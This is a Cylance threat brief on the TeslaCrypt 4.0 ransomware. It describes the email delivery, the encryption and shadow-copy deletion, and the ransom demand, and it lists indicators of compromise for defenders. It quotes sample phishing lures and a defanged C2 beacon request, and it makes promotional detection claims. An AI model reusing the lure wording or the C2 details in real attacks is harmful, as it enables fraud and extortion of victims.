Cylance Quick Brief: TeslaCrypt 4.0

Over the past few weeks, our research teams here at Cylance have witnessed the emergence of an update to the highly-prolific TeslaCrypt ransomware family. We were not alone in our observations, and many outlets have begun the requisite flurry of blogs, IOC updates, and any other means of distributing threat data in the hopes of assisting the security industry to curtail the threat.

The update, TeslaCrypt 4.0, includes stronger encryption using RSA-4096, bug fixes, formatting changes such as omitting easily recognizable extensions for encrypted files, and changes to the ransom note and instructions. Beyond this, the basic attack model remains the same.

TeslaCrypt: the Saga Continues

TeslaCrypt initially surfaced in March 2015 as an aggressive ransomware which specifically targeted gamers. Users of 40 popular games such as World of Warcraft, DayZ, Fallout, Diablo, Minecraft and Call of Duty found themselves locked out of their games with crucial and hard-earned files including saved games, maps, mods and configurations maddeningly encrypted.

TeslaCrypt also sought out and encrypted valuable finance-related files such as tax returns and Quicken software files, plus files with common extensions such as JPEG, PDF and DOC. Newer generations of TeslaCrypt now infect computers without any stored games, as the ransomware continues to evolve. Once the user is infected, TeslaCrypt demands payment of $500 in Bitcoin in order to decrypt the user’s locked files.

Although security researchers were initially able to release a number of free decryption tools that exploited a weakness in the ransomware, when version 3.0 was released  in January 2016, it included a patch for the flaw, rendering the decryption tools ineffective.  

Initial Deployment of Version 4.0

The initial campaigns for TeslaCrypt 4.0 were email based. These emails had a malicious .ZIP attachment containing a .JS file. The .JS file was responsible for retrieving an executable from a remote server. This second stage executable was responsible for the file encryption routines.

TeslaCrypt_spam_messagelist.png

Figure 1: Malicious emails with TeslaCrypt .ZIP attachment

It is important to note that, as with other ransomware attacks, user interaction is a requirement to the successful deployment of TeslaCrypt. The victim must be lured into manually opening and launching the attachments in the email. As such, the actors behind this campaign have updated their social engineering tactics to make their email hooks more enticing and authentic in appearance, typically by preying upon the user’s fear of having their bank account compromised or of making a mistake in their taxes. 

Example Subject Lines:

Your account ID:69938 has been suspended.

Your account ID:11542 has been suspended.

Example Body Text:

Your bank account associated with the ID:11542 has been suspended because of the unusual activity connected to this account and a failure of the account holder to pay the taxes on a due date.

Your debt: - 341,24 USD

For more details and the information on how to unlock your account please refer to the document attached.

Example Attachment Names:

  • confirm_66988313.zip
  • warning_letter_43923148.zip
  • watch_it_89827269.zip

Execution of TeslaCrypt 4.0

Once executed, TelsaCrypt’s encryption routine and system modification begin. The stronger cryptography used in this version makes previously successful methods of recovery no longer possible. Third party decryption and recovery tools will not function with TeslaCrypt 4.0. Likewise, it is computationally infeasible to break the encryption.

To make matters worse, similar to other recent ransomware threats, TeslaCrypt will attempt to delete the VSS volume data (Volume Shadow Copies) from the user’s machine, thereby making the most obvious fix unavailable.

cropped_doc_instru.jpg

Figure 2: TeslaCrypt ransom note displayed as a Notepad file

C2 Communications resemble the following:

  • URL: h x x p:// marvel-games[.]com/binstr[.]php
  • Data: POST /binstr.php HTTP/1.1
  • Accept: `\xff\xc1\x02X            1\x038\x01\xc1\x02n\x07\x01g\xf8t\xc1\x02, \, X 1\x03`\xff\xc1\x02DCED486F16D001F6CA18E3D207F6ADCF1225FD4C843950AC2230FF235664BA07067CFBC16C72F08627A91036EEC585A4509F34FC01D8BD6BAD2F099C9D40FA31EB2E513E8C2AD2812BD305D36148FEBBE866E5AD616E88027F40E42DED, `\xff\xc1\x02X 1\x038\x01\xc1\x02n\x07\x01g\xf8t\xc1\x02, \xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe4\xe4\xe4\x1b\xe2\xe2\xe2\x1d\xde\xde\xde#\xe3\xe3\xe3%\xfe\xfe\xfe\x13\xff\xff\xff\x02\xff\xff\xff
  • Content-Type: application/x-www-form-urlencoded
  • CUser-Agent: Mozilla/5.0 (Windows NT 6.3 rv:11.0) like Gecko
  • CHost: marvel-games.com
  • CContent-Length: 645
  • CCache-Control: no-cache

Decryption Process

Payment to decrypt the user’s files is requested via Bitcoin (BTC) as per the instructions provided on the ransomware lock screen:

TeslaCrypt-BITCOIN.png

Figure 3: Ransom note generated by TeslaCrypt 4.0

As of March 2016, standard AV detection rates are still abysmally low for TelsaCrypt.  Even with the ample media coverage and exhaustive sharing of file details within the industry, we are still seeing very low detection rates for both the .JS and .EXE files associated with this threat.  

Example:

One leading multi-engine upload site shows this to have a 5/57 detection rate as of 3/24/2016:

SHA256 – 6964900cef84e768d69424e4950ac74992dbdf654e6865df59932dd4bd8f64bc

CylancePROTECT® vs. TeslaCrypt 4.0

Cylance pulled samples of the latest variation of TeslaCrypt based on C2 domains and other relationship markers, and deployed them on a machine loaded with CylancePROTECT. In this round, we looked at 60 unique binaries. Out of the 60, CylancePROTECT both detected and blocked 100% of those unique binaries, using a mathematical detection model that PRE-DATES the current TeslaCrypt campaigns.

Once again, the math prevails and prevents a potentially catastrophic ransomware attack:

CylancePROTECT_console.png

Figure 4: CylancePROTECT console showing detection of TelsaCrypt 4.0

Hashes (SHA256):

  • 6cb9ef0cb238752db082c482a35053d0dddff28becf1cfbb4a632d72aced1e2c
  • 50f84771d333540c969ec2183f7712e53ab0a387191c7b58678eae82fd548456
  • a7fd86ee2179598a7830d16f1b3c3b3bd7c89d5c03c993c9a0819665977dfe69
  • 5aa6a88868308064e1f9f8df3477addd3baf5e864523717d2b654705f4630588
  • 593543fffae9c12cb2d527c405309b46575aa111d64689d593785643e1294b30
  • f5a5102bae7fbf31ab2318c8d0feb9c691d1d7345d3f3885edeb2cf41edda596
  • b29b77d35c65b2543f1d7a8fe7feb64cefe2204a3fb2225cb4c7c4a4734b0cdc
  • 475022ad1c94da21d90cc48523f92a91533781c9c3101c7f64cbf8d2e6e05819
  • 6bdab9543a8ac059bb2b333755da5d534f8430aa09f9e4a359e78151d2aeb1b5
  • b568d4b836139baa0123fd5eabdde20bfabe05324ba7d68bfc2b02efa0bb6b0b
  • 1d8e0998e760a690070d1101b72c10ce129378e8a212221b04c5b866f6634d2c
  • e1ea9a411a2bea988c2b921871849b9b9039193104c885bedb99f8c8d3bb1214
  • 062dbdad33b58903a14bb49d2888714deb45ff7439bd28ebe8660d2ef4fcc1a0
  • 6964900cef84e768d69424e4950ac74992dbdf654e6865df59932dd4bd8f64bc
  • 72c11bc4998ba5b2c5717af04187259f6ddc9297ebd092f2aa1c32d165fd2648
  • 4b60a413c2c3c7608b8473eb2d6941b5ef7c4663a07fabb58e1985bd5a29ba38
  • 16e2d300a5133c6a0ff21e7cb6575507405df4c096828424eb370fdec4e2f89f
  • 2433f6e17cf7381cec531acb490fc13399392bc5dfe340f2549555923293a983
  • f581ea4ba7a3c58ef8dd5923401cd720a3fc7c58e13c1101471d8ca090d9f3c2
  • 8dbcc4795a8f9f6fc02aac62a0498ddbc6592ba34d1cc8eeea8a2cf18511da78
  • ef0df94ca52c835a74d047de808e9c24f31c9468953a11c0cc76cc97432d1647
  • 48b6f4c6a99547fdd9bdff0b815f1c6582664d6c366c7dd5962c730c2656f750
  • ad89f8066a368c14418d1c3b8144454f22d784f10785958142a934dc36e616a9
  • b253da1456b47de73f146ef395ae8e4b105751acaddf8b2fcb9e50398b79b27c
  • 943b2d3ac10936ef65244c894d831dddd22cd865d8e6b6fe9fbf50876f6781ce
  • 3189ad72d4c817ad4dcc4320eed86157d1c5232393a186a47efba5c6149198a6
  • ad0a52c915f4eb78c59e54db0f441edddaf56a9d6a812bedb1b52a910248072f
  • b2f857e052924061c219b6462a06f2b6221409e706204c4e247611bfbfa71cf2
  • 95f49139ff0f98af8ac0f26b15f4add0c56c45afb2261eb257c6cc44f4f76d34
  • 673d694e9debc2832baab93b633a815dc478453bf429551364902297493dd7ba
  • 644c54329771fa735a34390e72532e0262ce9f0ca6e18ccefd4d141aa4d5995b
  • 42e562c5902cbd0a531a41925956c632e1e957f7f79cb58b1310eedd1cf77921
  • c830dc7f823c71e50b0302849d4e546f4dae75dea8694fef903991c6759f9feb
  • 7da88e7719267a69d75bd8a44455a7d4e9cabf0c1639c7d200243517b354dd17
  • f8b4ca84f342d351ce94342dd77fe8c420fca157c6de31ced78d278e8d514b7c
  • e823b0bf0935559e2913b3adb6d650d85f2fe8345aa3d5321f235a7261ec12ef
  • b1064d0229bee77960dda91ad91b1fc77a0e13e4139a9e04539dc1107e1163fc
  • 839067b46b94eaa4d471d39229bf8b77fc4e333e3ba2c8358ef4e0f85ff5aa20
  • e052f248f9a4e667b9c4658e8340811c6fff2db35f79e88756af680d3f12e2af
  • ebafe18803975341b9a6f4cee298a5e8a2adb7df539dff722f1689b4ca6999cb
  • 8331e625dc343d59c007f4814d88ba4ca59090db37102b41b7acac97a2044356
  • 9d27684ad3cfe7036b0f8b76146485c4808088767fd7de70381e7dd42b866b1f
  • 0f79116e2d6a2259724f48f79c89421f50d2dee82b279f24c50d364337cfe8de
  • 3906731fd5c73b193b03251a6922d7a3c8ac0b248e9cc52f3a0997e9c6b2a24b
  • 0f50bdaa0c6576ac49ab48582ea5108083f1cd8fc439bc3737967729985818f3
  • 86ee7197f19434ca385204b94acda7af8671c0db3103cbcfe9e21651c3df60b3
  • 4c749298a32f1913282dd7cffeb23bacfbe9164b85673e54a78e5b708a87ecaa
  • 584d2cc682be4cd81117f4aec2bcf8600a209482609ab2b4a3a7f02bf314436a
  • d62ad20b0b0f314d32a45688d8b47f85e0b0eae9a18e5533ac2d37c2fa530f63
  • 6e151355866e68cb527c593a543604e80c2e14b9c12d733c90fdf1e7a213e1cf
  • bf403e9f57535c440870ca92aedb324a10c998d0c3aac158e5108150e89a0fb4
  • 9731588e5bd63200f01d21707293beeadca9da38d791d65486bd805ef914a252
  • 7db62797f09e8b4c91b54ad84c3f904643ff7e6a2cb9162a59f05a88ad84719a
  • 1ab761f6c5659b57f8dc82d59aa756ae4ff68d5e31010d448f13110bf9d04efb
  • 3ae6099b7cd27530c11d74c25becf5b73910bf63d8e2b430b49e12177126e7ef
  • e15e39032dac05b65e78b044d44215742aee475cebf5ddcc1199fc0c8ac43f22
  • d3b16261b5b5ee7c4ced37f58bd307f5a6bc7771e7ba5ffcd9dd07cc84225479
  • 086691503751c00b0a28323507543e01478a26a1ca8d3af5b0e36b0f63dfab04
  • 16097d181bfd788211e2efb5d259b125ad196454fee49e763c0327d58e0fd0e1
  • 93ad40cd3fd7d5934e37b3ed09f44dc70cc616326b41578f549c6477bbf6cfe1

Additional Indicators of Compromise (IOCs)

Domains:

  • marvel-games.com
  • grandmahereqq.com
  • grandaareyoucc.asia
  • kel52.com
  • sappmtraining.com
  • controlfreaknetworks.com
  • Email Senders:

    • gaskellBeverley76675 (at) vocationalalternatives.com
    • sutcliffeLester87269 (at) thiagoamaroarquitetura.com
    • mousleyHarris145 (at) questcomputersolutions.com

    Believe the math!!